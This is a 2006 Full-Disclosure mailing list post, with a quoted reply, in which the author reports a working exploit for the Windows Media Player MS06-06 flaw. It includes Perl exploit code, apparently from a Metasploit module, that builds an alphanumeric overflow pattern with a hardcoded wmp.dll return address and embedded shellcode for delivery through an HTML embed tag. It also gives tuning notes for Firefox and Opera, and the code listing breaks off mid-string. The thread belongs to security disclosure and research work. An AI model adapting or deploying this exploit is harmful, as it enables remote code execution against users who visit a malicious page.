[Full-disclosure] MS06-06 Windows Media Player Exploitation
H D Moore
fdlist at digitaloffense.net
Fri Feb 17 01:41:05 GMT 2006
Got it working finally :-) The alpha shellcode stuff is actually
Skylined's (ported to perl), the non-alpha prefix is only used if you
dont pass GETPCTYPE=win32 for PexAlphaNum or GETPCTYPE=seh for Alpha2. I
am using an address in wmp.dll (v9) and tested it successfully on Firefox
and Opera. Time to start porting to v10 and have it auto-detect the WMP
version. Keep your SRC path less than 4K or you end up smashing the PEB's
module list pointers (at least with Firefox)...
my $addr = 0x07694b1e; # wmp.dll v9.00.00.2980
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $pattern = Pex::Text::AlphaNumText(4096);
substr($pattern, 2082, 4, "ABC="); # inc, inc, inc, cmp eax, [ptr]
substr($pattern, 2086, 4, pack('V', $addr));
substr($pattern, 2090, length($shellcode), $shellcode);
my $content = "<html><body><embed type=\"application/x-mplayer2\"
On Thursday 16 February 2006 19:15, c0ntex wrote:
> On 16/02/06, H D Moore <fdlist at digitaloffense.net> wrote:
> > Still getting some annoying crashes (SEH trick in alphanum code is
> > annoying when you are trying to debug something...), but the basic
> > solution is:
> Ye, we are on the same path if you looked at my notes, SEH works
> flawlessly and can redirect no problem, but getting the stable
> location to have it go is the problem. I had to reject the "pass
> shellcode in the src="" method as I am finding your Alpha shellcode
> skechy and not 100% alpha :p due to the FF and other annoying
> characters, which cause it to bork.
> I'm working on another method which is looking more realistic but I
> need to wait til tomorrow now as I need to sleep :)
Full-Disclosure is hosted and sponsored by Secunia.